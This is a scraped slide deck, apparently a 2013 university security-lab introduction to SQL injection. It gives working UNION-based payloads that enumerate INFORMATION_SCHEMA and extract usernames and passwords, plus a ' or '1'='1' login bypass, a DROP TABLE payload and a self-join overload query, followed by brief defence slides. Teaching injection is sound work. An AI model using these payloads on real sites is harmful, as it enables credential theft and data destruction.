Upload
sina-manavi
View
245
Download
0
Embed Size (px)
Citation preview
7/28/2019 A brief Intorduction in SQL Injection
1/22
Security Lab, University Putra Malaysia
23 May 2013
Sina Manavi
Contact:http://sinamanavi.blogspot.com/p/about-me.html
http://sinamanavi.blogspot.com/p/about-me.htmlhttp://sinamanavi.blogspot.com/p/about-me.htmlhttp://sinamanavi.blogspot.com/p/about-me.htmlhttp://sinamanavi.blogspot.com/p/about-me.htmlhttp://sinamanavi.blogspot.com/p/about-me.html7/28/2019 A brief Intorduction in SQL Injection
2/22
Introduction
Why SQL Injection
What is needed for this
What you can do with SQL Injection What are its pros and cons
Why we need to know and how we can prevent ourdatabase from SQL injection attacks
7/28/2019 A brief Intorduction in SQL Injection
3/22
We are all familiar with SQL Language
One of the technology that helped in converting the static
web to dynamic one
SQL is relatively easy to read, a little more difficult to write Works on Servers such as Apache, MS Server, etc.
SQL Injection means manipulate SQL tables withunauthorized access
7/28/2019 A brief Intorduction in SQL Injection
4/22
7/28/2019 A brief Intorduction in SQL Injection
5/22
SQL Injection may happen only two form of UIbased or URL based (1) Injecting into a form. Such as username and
password boxes on a login page.
(2) Injecting into a URL. Likehttp://yourtarget.com/products/list.php?pid=10
7/28/2019 A brief Intorduction in SQL Injection
6/22
Simple example:
Select ID from tbl_users Where ID=Uid and pass=pass
If it returns any value means that the current inputsare correct
7/28/2019 A brief Intorduction in SQL Injection
7/22
www.yourtarget.com/list?id=5
if you want to view a record from a table by
the URL based injection:Select * from tbl_usersWhere id=5
7/28/2019 A brief Intorduction in SQL Injection
8/22
The "INFORMATION_SCHEMA" holds thenames of every table and column on a site, itsname will never change. Tables holding all the tables name:
"INFORMATION_SCHEMA.TABLES.
Tables holding all the Column name:
"INFORMATION_SCHEMA.COLUMNS.
7/28/2019 A brief Intorduction in SQL Injection
9/22
Finding the URL quantity: www.yourtarget.com/list.php? ID=10+ORDER+BY+1--Increase the 1 , until you got error, then the last number isthe column number
Finding Table name www.yourtarget.com/list.php? ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES--
And it shows:tbl_user
To Be continued
http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--7/28/2019 A brief Intorduction in SQL Injection
10/22
Now its time to find out the Column names:www.yourtarget.com/list.php? ID=
-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=tbl_user'--
The result would be as following :
id,username,password
Column names finding step:www.yourtarget.com/list.php? ID=
-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'
Try the columns name until you find your target (e.g username,password, or login)
http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--7/28/2019 A brief Intorduction in SQL Injection
11/22
And Finally its time to see the records: www.yourtarget.com/list.php?=-1+UNION+SELECT+1,username,3+FROM+UserAccounts
And www.yourtarget.com/list.php?=-1+UNION+SELECT+1,password,3+FROM+UserAccounts Username=admin password=123456
Stupid admin ha ;)
http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--7/28/2019 A brief Intorduction in SQL Injection
12/22
Now we can Alter the records as well, letsrock
UPDATE tbl_user
SET password = SHA2('$password')
WHERE id = $id
Or we can Insert a new user with Insert
Command
7/28/2019 A brief Intorduction in SQL Injection
13/22
If user_list contains 1000 records then, the databaseis fired up
SELECT * FROM user_list JOIN user_list
JOIN user_list JOIN user_list JOIN user_listJOIN user_list
7/28/2019 A brief Intorduction in SQL Injection
14/22
Insert newuser into tbl_user
The maliciouse code can be :
DROP table tbl_user
7/28/2019 A brief Intorduction in SQL Injection
15/22
How it worksSelect * from tbl_users
Where id=Fname and pass=pass
Malicious Code:
SELECT * FROM table WHEREid= Fname' or '1'='1';if(mysql_num_rows($result))
//do login
Now the unauthorized user get accessed easily andbypassed the authorization
7/28/2019 A brief Intorduction in SQL Injection
16/22
Security is the developersjob No database, connector, or framework
can prevent SQL injection all the time
7/28/2019 A brief Intorduction in SQL Injection
17/22
Implement proper Error Handling. This wouldinclude using a single error message for all errors.
Lock down User Database configuration, Specify
users, roles and permissions etc.
prefix and append a quote to all user input, even ifthe data is numeric .
7/28/2019 A brief Intorduction in SQL Injection
18/22
7/28/2019 A brief Intorduction in SQL Injection
19/22
Vipin Samar, Oracle vice president of DatabaseSecurity:
Database Firewall is a good first layer ofdefense for databases but it won't protect youfrom everything,
7/28/2019 A brief Intorduction in SQL Injection
20/22
Using Stroprocedures:CREATE PROCEDURE SP_show_user(IN U_ID)
BEGIN
SELECT * FROM Bugs WHERE User_ID= U_ID;
END
CALL SP_show_user(54)
Might be helpful but still vulnerable
7/28/2019 A brief Intorduction in SQL Injection
21/22
I dont have to worry anymore Escaping is the fix More escaping is better I can code an escaping function Only user input is unsafe Stored procs are the fix SQL privileges are the fix My app doesnt need security Frameworks are the fix Parameters quote for you Parameters are the fix Parameters make queries slow SQL proxies are the fix NoSQL databases are the fix
7/28/2019 A brief Intorduction in SQL Injection
22/22
NoSQL databases are immune to SQL injection.